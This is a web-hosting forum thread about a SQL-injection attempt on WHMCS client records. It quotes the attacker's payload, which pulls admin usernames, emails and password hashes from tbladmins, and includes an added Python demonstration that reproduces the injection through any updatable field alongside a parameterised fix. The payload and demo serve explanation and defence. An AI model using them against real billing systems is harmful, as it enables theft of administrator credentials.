WHMCS still has security issues? I found this
Megahosting
Member
in General
A few minutes ago someone registered on my site and put this in their personal data.
Client ID: 2467 - Innocent baba has requested to change his/her details as indicated below:
First Name: 'Innocent' to 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'
Last Name: 'baba' to '1'
Company Name: 'asdfasdf' to '1'
Address 1: 'aad' to '1'
Address 2: 'adfa' to '1'
City: 'aaaaaa' to '1'
State: 'Berlin' to '1'
Country: 'DE' to 'US'
Phone Number: '01 1111111111' to '1'
Default Payment Method: '' to ''
Comments
Looks like someone trying to exploit one of the vulnerabilities that has come to light in the past few weeks but has since been patched. There's no reason to think this is a new issue, unless anyone else spots anything new about this. (Just because people are trying to exploit a vulnerability, it doesn't mean WHMCS is still vulnerable to it - it just means their attempt will fail).
Are you running 5.2.10?
Phew! I thought it was another new exploit.
That's a relief...
Yes, I'm running the latest. Still no answer from the WHMCS team about that.
I have people doing this all the time; nothing will happen (I hope...).
Nothing would happen.
That user tried to exploit a bug in version 5.2.8. If the bug succeeded, his first name would change to all your WHMCS admin usernames, emails and passwords.
WHMCS answered "no problem" and that I need to ban that IP address for security. LOL
Why not just disable the changing of the name? That shuts down any possibility of this or modified similar exploits from working. I think they have to register a legit-looking name first, otherwise it doesn't get past the internal checks.
Why just name? Any updatable field works judging from the old code.
As far as I know you have to have they key statement in the first name field.
The vulnerability is on the update query creation function, not on updating the first name. While the specific exploit code released relies on changing account details, the vulnerability can still obviously be exploited in other parts of the code that use any sort of user input.
Of course, you might not be able to get user details. But you'd still be able to update all tickets if you use the exploit when opening a ticket, etc.
If you only care about blocking script kiddies then restricting changing of client information is okay. But if you're serious about security then that's a ridiculous attack prevention mechanism, although it would still certainly curb the chance of an attack a lot if localhost.re continues to use firstname updates in their proofs of concept.
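To make the two claims above concrete (the post saying the payload would overwrite the first name with a dump of tbladmins, and the reply saying the defect lives in the update-query builder and so reaches every field the builder handles), here is an added example. It is not WHMCS code and not localhost.re's proof of concept. It assumes, modelled only on the shape of the posted payload, that the vulnerable builder emits any value starting with `AES_ENCRYPT(` unquoted so encrypted columns can be written, and it uses an in-memory SQLite database with a constructed `tbladmins`/`tblclients` schema in place of MySQL, so the payload is rewritten in SQLite syntax (`||` concatenation and `group_concat(expr, sep)` instead of the MySQL `GROUP_CONCAT ... SEPARATOR` and `0x..` literals). The hardened builder beside it binds every value as a parameter.

```python
import sqlite3

# Constructed payload in the shape of the one posted in the thread, rewritten
# for SQLite. The prefix satisfies the builder's AES_ENCRYPT( special case; the
# ", firstname=(...)" part is a second assignment that wins over the first.
PAYLOAD = (
    "AES_ENCRYPT(1,1), firstname=(SELECT group_concat("
    "id || ':' || username || ':' || email || ':' || password, ', ') "
    "FROM tbladmins)"
)

ALLOWED_COLUMNS = {"firstname", "lastname"}


def setup_db():
    """Constructed sample data: two admin rows and the client being updated."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no AES_ENCRYPT; register a stand-in so the injected prefix parses.
    conn.create_function("AES_ENCRYPT", 2, lambda value, key: str(value))
    conn.executescript(
        """
        CREATE TABLE tbladmins(id INTEGER, username TEXT, email TEXT, password TEXT);
        INSERT INTO tbladmins VALUES (1, 'admin', 'admin@example.com', 'hash1');
        INSERT INTO tbladmins VALUES (2, 'ops',   'ops@example.com',   'hash2');
        CREATE TABLE tblclients(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT);
        INSERT INTO tblclients VALUES (2467, 'Innocent', 'baba');
        """
    )
    return conn


def vulnerable_update_query(table, values, client_id):
    """Assumed vulnerable builder: ordinary values are quote-escaped, but a value
    beginning with AES_ENCRYPT( is spliced in raw (the assumption this example
    rests on). The attacker therefore controls SQL after SET, whatever the column."""
    parts = []
    for col, val in values.items():
        if isinstance(val, str) and val.startswith("AES_ENCRYPT("):
            parts.append(f"{col}={val}")  # raw SQL, no quoting
        else:
            escaped = val.replace("'", "''")
            parts.append(f"{col}='{escaped}'")
    return f"UPDATE {table} SET {', '.join(parts)} WHERE id={int(client_id)}"


def safe_update_query(table, values, client_id):
    """Hardened builder: column names checked against an allow-list, every value
    bound as a parameter so it can never become SQL syntax."""
    bad = set(values) - ALLOWED_COLUMNS
    if bad:
        raise ValueError(f"column(s) not updatable: {sorted(bad)}")
    cols = list(values)
    sql = f"UPDATE {table} SET {', '.join(f'{c}=?' for c in cols)} WHERE id=?"
    return sql, [values[c] for c in cols] + [client_id]


def exploit_via(field):
    """Send the payload through `field` using the vulnerable builder and return
    what ends up in the client's firstname column. Because the payload's second
    assignment targets firstname, the dump lands there from any field."""
    conn = setup_db()
    values = {"firstname": "Innocent", "lastname": "baba"}
    values[field] = PAYLOAD
    conn.execute(vulnerable_update_query("tblclients", values, 2467))
    return conn.execute("SELECT firstname FROM tblclients WHERE id=2467").fetchone()[0]


def safe_update(field):
    """Same submission through the parameterised builder; the payload is stored
    as an inert string in whichever column it was sent to."""
    conn = setup_db()
    values = {"firstname": "Innocent", "lastname": "baba"}
    values[field] = PAYLOAD
    sql, params = safe_update_query("tblclients", values, 2467)
    conn.execute(sql, params)
    return conn.execute(
        "SELECT firstname, lastname FROM tblclients WHERE id=2467"
    ).fetchone()


if __name__ == "__main__":
    print("vulnerable, payload in firstname:", exploit_via("firstname"))
    print("vulnerable, payload in lastname: ", exploit_via("lastname"))
    print("safe, payload in firstname:      ", safe_update("firstname"))
```

Running it prints the admin dump in the first name for both the firstname and the lastname submission, which is the point of the reply above: locking the first-name field closes the published proof of concept, not the bug. The safe builder leaves the payload as data. Note that both SQLite and MySQL keep the rightmost assignment when a column is set twice in one UPDATE, which is what lets the injected `firstname=(SELECT ...)` override the legitimate value.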
Guess you should tell that to all the people banging away at my WHMCS installs trying to change the first name, then giving up when they find out they can't. Not a single person has tried to add it to a different field. What does that prove? Not much, but a lot more than your statement proves.
So once again. Show me the proof to back up your claims.
The nature of the exploit makes it obvious to anyone who knows a bit about web application security and/or SQL injections that it can be used in the same way on other queries. If you're at all serious about security you should be more concerned with verifying that an application is secure rather than verifying that it is insecure.
Same here
We had someone weeks back signup and put false data in but turns out was a legit customer. They simply wanted to hide their identity. However, we directed them to our TOS/AUP and they corrected their profile.
It is probably best for everyone to simply lock client fields for the time being. I am curious about what the future holds for WHMCS.
If you are "serious about security" why haven't you done any penetration testing?
We are currently working on a free software billing panel to replace our WHMCS installation.
Until then, please share your penetration testing results with the community. We can all use the info from people such as yourself who are "serious about security" because they know how to google 'SQL injection'.